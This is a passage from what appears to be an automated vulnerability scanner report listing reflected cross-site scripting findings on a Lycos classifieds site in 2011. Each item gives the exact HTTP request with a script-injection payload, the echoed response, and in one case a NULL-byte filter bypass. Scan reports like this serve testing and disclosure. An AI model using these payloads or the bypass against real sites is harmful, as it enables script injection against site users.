P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/healthy-english-bulldog-puppies-2416171752%00c2c49"><script>alert(1)</script>939ac719ce9?mobile=1" rel="nofollow">
...[SNIP]...

1.143. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/healthy-english-bulldog-puppies-2416171752

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b055e"><script>alert(1)</script>edd94c248b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/healthy-english-bulldog-puppies-2416171752?b055e"><script>alert(1)</script>edd94c248b7=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:29 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/
Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/healthy-english-bulldog-puppies-2416171752?b055e"><script>alert(1)</script>edd94c248b7=1&mobile=1" rel="nofollow">
...[SNIP]...

1.144. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a3fe"><script>alert(1)</script>ad8ae194ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog8a3fe"><script>alert(1)</script>ad8ae194ef/waiting-for-new-alaskan-malamute-puppies-2416164302 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog8a3fe"><script>alert(1)</script>ad8ae194ef/waiting-for-new-alaskan-malamute-puppies-2416164302?mobile=1" rel="nofollow">
...[SNIP]...

1.145. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004ebf0"><script>alert(1)</script>a2eb223d25 was submitted in the REST URL parameter 2. This input was echoed as 4ebf0"><script>alert(1)</script>a2eb223d25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302%004ebf0"><script>alert(1)</script>a2eb223d25 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302%004ebf0"><script>alert(1)</script>a2eb223d25?mobile=1" rel="nofollow">
...[SNIP]...

1.146. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa6ca"><script>alert(1)</script>0c908744318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302?aa6ca"><script>alert(1)</script>0c908744318=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:38 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/
Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302?aa6ca"><script>alert(1)</script>0c908744318=1&mobile=1" rel="nofollow">
...[SNIP]...

1.147. http://classifieds.lycos.com/sale-pet-fish/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-fish/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0144"><script>alert(1)</script>d312a9b0273 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-fishc0144"><script>alert(1)</script>d312a9b0273/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:20 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-fishc0144"><script>alert(1)</script>d312a9b0273/?mobile=1" rel="nofollow">
...[SNIP]...

1.148. http://classifieds.lycos.com/sale-pet-fish/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-fish/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b85c7"><script>alert(1)</script>713d5e4757f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-fish/?b85c7"><script>alert(1)</script>713d5e4757f=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-fish/?b85c7"><script>alert(1)</script>713d5e4757f=1&mobile=1" rel="nofollow">
...[SNIP]...

1.149. http://classifieds.lycos.com/sale-pet-supply/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-supply/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3911c"><script>alert(1)</script>66ee9192fac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-supply3911c"><script>alert(1)</script>66ee9192fac/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:13:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:13:01 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-supply3911c"><script>alert(1)</script>66ee9192fac/?mobile=1" rel="nofollow">
...[SNIP]...

1.150. http://classifieds.lycos.com/sale-pet-supply/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-supply/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a6f1"><script>alert(1)</script>cd8f68d27cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-supply/?8a6f1"><script>alert(1)</script>cd8f68d27cb=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:12:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-supply/?8a6f1"><script>alert(1)</script>cd8f68d27cb=1&mobile=1" rel="nofollow">
...[SNIP]...

1.151. http://classifieds.lycos.com/sale-pet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d65"><script>alert(1)</script>225a18cf5e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet71d65"><script>alert(1)</script>225a18cf5e2/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:00 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet71d65"><script>alert(1)</script>225a18cf5e2/?mobile=1" rel="nofollow">
...[SNIP]...

1.152. http://classifieds.lycos.com/sale-pet/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 578d0"><script>alert(1)</script>75191efa096 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet/?578d0"><script>alert(1)</script>75191efa096=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet/?578d0"><script>alert(1)</script>75191efa096=1&mobile=1" rel="nofollow">
...[SNIP]...

1.153. http://classifieds.lycos.com/sale-sale-garage/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-sale-garage/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804d0"><script>alert(1)</script>d30bcf2ddf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-sale-garage804d0"><script>alert(1)</script>d30bcf2ddf0/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-sale-garage804d0"><script>alert(1)</script>d30bcf2ddf0/?mobile=1" rel="nofollow">
...[SNIP]...

1.154. http://classifieds.lycos.com/sale-sale-garage/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-sale-garage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ba75"><script>alert(1)</script>813bfeb0c7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-sale-garage/?8ba75"><script>alert(1)</script>813bfeb0c7f=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:25 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-sale-garage/?8ba75"><script>alert(1)</script>813bfeb0c7f=1&mobile=1" rel="nofollow">
...[SNIP]...

1.155. http://classifieds.lycos.com/sale-tickets-concert/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-concert/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae616"><script>alert(1)</script>b08377a555c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-concertae616"><script>alert(1)</script>b08377a555c/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-concertae616"><script>alert(1)</script>b08377a555c/?mobile=1" rel="nofollow">
...[SNIP]...

1.156. http://classifieds.lycos.com/sale-tickets-concert/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-concert/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c465c"><script>alert(1)</script>687d071c269 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-concert/?c465c"><script>alert(1)</script>687d071c269=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-concert/?c465c"><script>alert(1)</script>687d071c269=1&mobile=1" rel="nofollow">
...[SNIP]...

1.157. http://classifieds.lycos.com/sale-tickets-group-class_workshop/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-class_workshop/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac20"><script>alert(1)</script>238d92d6570 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

